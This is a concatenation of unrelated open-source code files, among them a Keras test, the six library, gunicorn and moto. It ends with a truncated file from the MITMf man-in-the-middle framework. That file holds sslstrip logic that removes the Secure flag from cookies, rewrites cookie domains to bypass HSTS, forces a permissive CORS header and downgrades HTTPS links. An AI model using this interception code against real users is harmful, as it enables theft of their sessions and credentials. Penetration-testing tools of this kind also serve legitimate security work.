"""
height = len(lines)
if height > 0:
width = len(lines[0])
else:
width = 0
frame = Frame(width, height)
for y in range(height):
for x in range(width):
char = lines[y][x]
frame.set_dot(x, y, palette[char])
return frame
create_with_text = staticmethod(create_with_text)
def create_frames_from_grid( self, num_cols, num_rows ):
frames = []
width = self.width / num_cols
height = self.height / num_rows
# Use nested loops to step through each column of each row, creating a new frame at each iteration and copying in the appropriate data.
for row_index in range(0,num_rows):
for col_index in range(0,num_cols):
new_frame = Frame(width, height)
Frame.copy_rect(dst=new_frame, dst_x=0, dst_y=0, src=self, src_x=width*col_index, src_y=height*row_index, width=width, height=height, op='copy')
frames += [new_frame]
return frames
class Layer(object):
"""
The ``Layer`` class is the basis for the pyprocgame display architecture.
Subclasses override :meth:`next_frame` to provide a frame for the current moment in time.
Handles compositing of provided frames and applying transitions within a :class:`DisplayController` context.
"""
opaque = False
"""Determines whether layers below this one will be rendered.
If `True`, the :class:`DisplayController` will not render any layers after this one
(such as from modes with lower priorities -- see :class:`DisplayController` for more information).
"""
target_x = 0
"""Base `x` component of the coordinates at which this layer will be composited upon a target buffer."""
target_y = 0
"""Base `y` component of the coordinates at which this layer will be composited upon a target buffer."""
target_x_offset = 0
"""Translation component used in addition to :attr:`target_x` as this layer's final compositing position."""
target_y_offset = 0
"""Translation component used in addition to :attr:`target_y` as this layer's final compositing position."""
enabled = True
"""If `False`, :class:`DisplayController` will ignore this layer."""
composite_op = 'copy'
"""Composite operation used by :meth:`composite_next` when calling :meth:`~pinproc.DMDBuffer.copy_rect`."""
transition = None
"""Transition which :meth:`composite_next` applies to the result of :meth:`next_frame` prior to compositing upon the output."""
def __init__(self, opaque=False):
"""Initialize a new Layer object."""
super(Layer, self).__init__()
self.opaque = opaque
self.set_target_position(0, 0)
def reset(self):
# To be overridden
pass
def set_target_position(self, x, y):
"""Setter for :attr:`target_x` and :attr:`target_y`."""
self.target_x = x
self.target_y = y
def next_frame(self):
"""Returns an instance of a Frame object to be shown, or None if there is no frame.
The default implementation returns ``None``; subclasses should implement this method."""
return None
def composite_next(self, target):
"""Composites the next frame of this layer onto the given target buffer.
Called by :meth:`DisplayController.update`.
Generally subclasses should not override this method; implementing :meth:`next_frame` is recommended instead.
"""
src = self.next_frame()
if src != None:
if self.transition != None:
src = self.transition.next_frame(from_frame=target, to_frame=src)
Frame.copy_rect(dst=target, dst_x=self.target_x+self.target_x_offset, dst_y=self.target_y+self.target_y_offset, src=src, src_x=0, src_y=0, width=src.width, height=src.height, op=self.composite_op)
return src
|
gangadhar-kadam/adb-erp
|
refs/heads/master
|
setup/doctype/price_list/price_list.py
|
5
|
# ERPNext - web based ERP (http://erpnext.com)
# Copyright (C) 2012 Web Notes Technologies Pvt Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import webnotes
from webnotes import msgprint, _
from webnotes.utils import cint
class DocType:
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def onload(self):
self.doclist.extend(webnotes.conn.sql("""select * from `tabItem Price`
where price_list_name=%s""", self.doc.name, as_dict=True, update={"doctype": "Item Price"}))
def validate(self):
if not (cint(self.doc.valid_for_all_countries) or len(self.doclist.get({"parentfield": "valid_for_countries"}))):
msgprint(_("""Please check "Valid For All Countries" or \
enter atlease one row in the "Countries" table."""), raise_exception=True)
def on_trash(self):
webnotes.conn.sql("""delete from `tabItem Price` where price_list_name = %s""",
self.doc.name)
|
keithf4/spotify_pm
|
refs/heads/master
|
find_dupes_user_playlists.py
|
1
|
#!/usr/bin/env python
from SpotifyPM import SpotifyPM
spm = SpotifyPM()
# Turn this into argparse argument
username = spm.get_username()
# Turn scope into argparse argument
sp = spm.auth(username, 'playlist-read-private')
if sp != None:
playlists = sp.user_playlists(username)
for playlist in playlists['items']:
if playlist['owner']['id'] == username:
print(playlist['name'])
dupe_list = spm.find_dupe_in_playlist(sp, playlist, username)
if len(dupe_list) > 0:
for name in dupe_list:
print("\t" + name)
else:
print("\t<<No dupes>>")
else:
print "Can't get token for", username
|
py-geek/City-Air
|
refs/heads/master
|
venv/lib/python2.7/site-packages/gunicorn/app/wsgiapp.py
|
96
|
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import os
import sys
from gunicorn.errors import ConfigError
from gunicorn.app.base import Application
from gunicorn import util
class WSGIApplication(Application):
def init(self, parser, opts, args):
if opts.paste and opts.paste is not None:
app_name = 'main'
path = opts.paste
if '#' in path:
path, app_name = path.split('#')
path = os.path.abspath(os.path.normpath(
os.path.join(util.getcwd(), path)))
if not os.path.exists(path):
raise ConfigError("%r not found" % path)
# paste application, load the config
self.cfgurl = 'config:%s#%s' % (path, app_name)
self.relpath = os.path.dirname(path)
from .pasterapp import paste_config
return paste_config(self.cfg, self.cfgurl, self.relpath)
if len(args) < 1:
parser.error("No application module specified.")
self.cfg.set("default_proc_name", args[0])
self.app_uri = args[0]
def chdir(self):
# chdir to the configured path before loading,
# default is the current dir
os.chdir(self.cfg.chdir)
# add the path to sys.path
sys.path.insert(0, self.cfg.chdir)
def load_wsgiapp(self):
self.chdir()
# load the app
return util.import_app(self.app_uri)
def load_pasteapp(self):
self.chdir()
# load the paste app
from .pasterapp import load_pasteapp
return load_pasteapp(self.cfgurl, self.relpath, global_conf=None)
def load(self):
if self.cfg.paste is not None:
return self.load_pasteapp()
else:
return self.load_wsgiapp()
def run():
"""\
The ``gunicorn`` command line runner for launching Gunicorn with
generic WSGI applications.
"""
from gunicorn.app.wsgiapp import WSGIApplication
WSGIApplication("%(prog)s [OPTIONS] [APP_MODULE]").run()
if __name__ == '__main__':
run()
|
souzainf3/namebench
|
refs/heads/master
|
tools/ordered-uniq.py
|
175
|
#!/usr/bin/env python
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Like uniq, but does not require sort-order to change."""
import sys
seen = {}
for full_line in sys.stdin:
line = full_line.rstrip()
if line not in seen:
sys.stdout.write(full_line)
seen[line] = 1
sys.stdout.close()
sys.stdin.close()
|
laszlocsomor/tensorflow
|
refs/heads/master
|
tensorflow/python/keras/_impl/keras/layers/normalization_test.py
|
30
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for normalization layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.keras._impl import keras
from tensorflow.python.keras._impl.keras import testing_utils
from tensorflow.python.platform import test
class NormalizationLayersTest(test.TestCase):
def test_basic_batchnorm(self):
with self.test_session():
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={
'momentum': 0.9,
'epsilon': 0.1,
'gamma_regularizer': keras.regularizers.l2(0.01),
'beta_regularizer': keras.regularizers.l2(0.01)
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={
'gamma_initializer': 'ones',
'beta_initializer': 'ones',
'moving_mean_initializer': 'zeros',
'moving_variance_initializer': 'ones'
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={'scale': False,
'center': False},
input_shape=(3, 3))
def test_batchnorm_weights(self):
with self.test_session():
layer = keras.layers.BatchNormalization(scale=False, center=False)
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 0)
self.assertEqual(len(layer.weights), 2)
layer = keras.layers.BatchNormalization()
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 2)
self.assertEqual(len(layer.weights), 4)
def test_batchnorm_regularization(self):
with self.test_session():
layer = keras.layers.BatchNormalization(
gamma_regularizer='l1', beta_regularizer='l1')
layer.build((None, 3, 4))
self.assertEqual(len(layer.losses), 2)
max_norm = keras.constraints.max_norm
layer = keras.layers.BatchNormalization(
gamma_constraint=max_norm, beta_constraint=max_norm)
layer.build((None, 3, 4))
self.assertEqual(layer.gamma.constraint, max_norm)
self.assertEqual(layer.beta.constraint, max_norm)
def test_batchnorm_correctness(self):
with self.test_session():
model = keras.models.Sequential()
norm = keras.layers.BatchNormalization(input_shape=(10,), momentum=0.8)
model.add(norm)
model.compile(loss='mse', optimizer='sgd')
# centered on 5.0, variance 10.0
x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 10))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= keras.backend.eval(norm.beta)
out /= keras.backend.eval(norm.gamma)
np.testing.assert_allclose(out.mean(), 0.0, atol=1e-1)
np.testing.assert_allclose(out.std(), 1.0, atol=1e-1)
def test_batchnorm_convnet(self):
if test.is_gpu_available(cuda_only=True):
with self.test_session(use_gpu=True):
model = keras.models.Sequential()
norm = keras.layers.BatchNormalization(
axis=1, input_shape=(3, 4, 4), momentum=0.8)
model.add(norm)
model.compile(loss='mse', optimizer='sgd')
# centered on 5.0, variance 10.0
x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 3, 4, 4))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= np.reshape(keras.backend.eval(norm.beta), (1, 3, 1, 1))
out /= np.reshape(keras.backend.eval(norm.gamma), (1, 3, 1, 1))
np.testing.assert_allclose(np.mean(out, axis=(0, 2, 3)), 0.0, atol=1e-1)
np.testing.assert_allclose(np.std(out, axis=(0, 2, 3)), 1.0, atol=1e-1)
def test_shared_batchnorm(self):
"""Test that a BN layer can be shared across different data streams.
"""
with self.test_session():
# Test single layer reuse
bn = keras.layers.BatchNormalization()
x1 = keras.layers.Input(shape=(10,))
_ = bn(x1)
x2 = keras.layers.Input(shape=(10,))
y2 = bn(x2)
x = np.random.normal(loc=5.0, scale=10.0, size=(2, 10))
model = keras.models.Model(x2, y2)
model.compile('sgd', 'mse')
model.train_on_batch(x, x)
assert len(model.updates) == 2
# Test model-level reuse
x3 = keras.layers.Input(shape=(10,))
y3 = model(x3)
new_model = keras.models.Model(x3, y3)
assert len(model.updates) == 2
new_model.compile('sgd', 'mse')
new_model.train_on_batch(x, x)
if __name__ == '__main__':
test.main()
|
SMALLplayer/smallplayer-image-creator
|
refs/heads/master
|
storage/.xbmc/addons/script.module.requests/lib/requests/packages/urllib3/packages/six.py
|
2374
|
"""Utilities for writing code that runs on Python 2 and 3"""
#Copyright (c) 2010-2011 Benjamin Peterson
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.2.0" # Revision 41c74fef2ded
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems("moves")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_code = "func_code"
_func_defaults = "func_defaults"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
if PY3:
def get_unbound_function(unbound):
return unbound
Iterator = object
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
else:
def get_unbound_function(unbound):
return unbound.im_func
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
def iterkeys(d):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)())
def itervalues(d):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)())
def iteritems(d):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)())
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
|
chp1084/raft
|
refs/heads/master
|
core/workers/ResponsesThread.py
|
11
|
#
# Author: Gregory Fleischer (gfleischer@gmail.com)
#
# Copyright (c) 2011 RAFT Team
#
# This file is part of RAFT.
#
# RAFT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RAFT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RAFT. If not, see <http://www.gnu.org/licenses/>.
#
from PyQt4.QtCore import Qt, QObject, SIGNAL, QThread, QTimer, QMutex
from PyQt4.QtGui import *
import traceback
from core.database.constants import ResponsesTable
class ResponsesThread(QThread):
def __init__(self, framework, treeViewModel, parent = None):
QThread.__init__(self, parent)
self.framework = framework
self.treeViewModel = treeViewModel
self.qlock = QMutex()
self.cursor = None
self.lastId = -1
self.fillAll = False
self.doCallback = False
self.callbackObj = None
QObject.connect(self, SIGNAL('quit()'), self.quitHandler)
QObject.connect(self, SIGNAL('started()'), self.startedHandler)
self.Data = None
self.cursor = None
def db_attach(self):
self.Data = self.framework.getDB()
self.cursor = self.Data.allocate_thread_cursor()
self.fillResponses(True)
def db_detach(self):
self.close_cursor()
self.Data = None
def close_cursor(self):
if self.cursor and self.Data:
self.cursor.close()
self.Data.release_thread_cursor(self.cursor)
self.cursor = None
def run(self):
QObject.connect(self, SIGNAL('doFillResponses()'), self.fillResponsesHandler, Qt.DirectConnection)
self.exec_()
def quitHandler(self):
self.framework.debug_log('ResponsesThread quit...')
if self.cursor:
self.cursor.close()
self.exit(0)
def startedHandler(self):
self.framework.debug_log('ResponsesThread started...')
self.framework.subscribe_response_data_added(self.fillResponsesHandler)
self.framework.subscribe_database_events(self.db_attach, self.db_detach)
def fillResponses(self, fillAll, callback = None):
self.fillAll = fillAll
if callback:
self.doCallback = True
self.callbackObj = callback
else:
self.doCallback = False
QTimer.singleShot(50, self, SIGNAL('doFillResponses()'))
def fillResponsesHandler(self, fillAll = False):
if self.qlock.tryLock():
try:
if self.fillAll:
self.fillAll = False
self.treeViewModel.clearModel()
self.lastId = -1
rows = self.Data.read_newer_responses_info(self.cursor, self.lastId)
count = 0
datarows = []
for row in rows:
count += 1
if 0 == (count % 100):
self.treeViewModel.append_data(datarows)
datarows = []
self.yieldCurrentThread()
responseItems = [m or '' for m in list(row)]
Id = str(row[ResponsesTable.ID])
self.lastId = int(Id)
if str(responseItems[ResponsesTable.CONFIRMED]).lower() in ('y', '1'):
confirmed = "Yes"
else:
confirmed = ""
responseItems[ResponsesTable.CONFIRMED] = confirmed
datarows.append(responseItems)
self.treeViewModel.append_data(datarows)
except Exception as error:
print(('FIX ME! ERROR: %s' % (traceback.format_exc(error))))
finally:
self.qlock.unlock()
if self.doCallback:
self.doCallback = False
self.callbackObj.emit(SIGNAL('fillResponsesFinished()'))
|
jotes/moto
|
refs/heads/master
|
moto/ec2/responses/key_pairs.py
|
10
|
from __future__ import unicode_literals
import six
from moto.core.responses import BaseResponse
from moto.ec2.utils import keypair_names_from_querystring, filters_from_querystring
class KeyPairs(BaseResponse):
def create_key_pair(self):
name = self.querystring.get('KeyName')[0]
keypair = self.ec2_backend.create_key_pair(name)
template = self.response_template(CREATE_KEY_PAIR_RESPONSE)
return template.render(**keypair)
def delete_key_pair(self):
name = self.querystring.get('KeyName')[0]
success = six.text_type(self.ec2_backend.delete_key_pair(name)).lower()
return self.response_template(DELETE_KEY_PAIR_RESPONSE).render(success=success)
def describe_key_pairs(self):
names = keypair_names_from_querystring(self.querystring)
filters = filters_from_querystring(self.querystring)
if len(filters) > 0:
raise NotImplementedError('Using filters in KeyPairs.describe_key_pairs is not yet implemented')
keypairs = self.ec2_backend.describe_key_pairs(names)
template = self.response_template(DESCRIBE_KEY_PAIRS_RESPONSE)
return template.render(keypairs=keypairs)
def import_key_pair(self):
raise NotImplementedError('KeyPairs.import_key_pair is not yet implemented')
DESCRIBE_KEY_PAIRS_RESPONSE = """<DescribeKeyPairsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<keySet>
{% for keypair in keypairs %}
<item>
<keyName>{{ keypair.name }}</keyName>
<keyFingerprint>{{ keypair.fingerprint }}</keyFingerprint>
</item>
{% endfor %}
</keySet>
</DescribeKeyPairsResponse>"""
CREATE_KEY_PAIR_RESPONSE = """<CreateKeyPairResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<keyName>{{ name }}</keyName>
<keyFingerprint>
{{ fingerprint }}
</keyFingerprint>
<keyMaterial>{{ material }}
</keyMaterial>
</CreateKeyPairResponse>"""
DELETE_KEY_PAIR_RESPONSE = """<DeleteKeyPairResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>{{ success }}</return>
</DeleteKeyPairResponse>"""
|
plotly/python-api
|
refs/heads/master
|
packages/python/plotly/plotly/validators/table/cells/_alignsrc.py
|
1
|
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="alignsrc", parent_name="table.cells", **kwargs):
super(AlignsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
byt3bl33d3r/MITMf
|
refs/heads/master
|
core/sslstrip/SSLServerConnection.py
|
26
|
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if self.hsts:
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
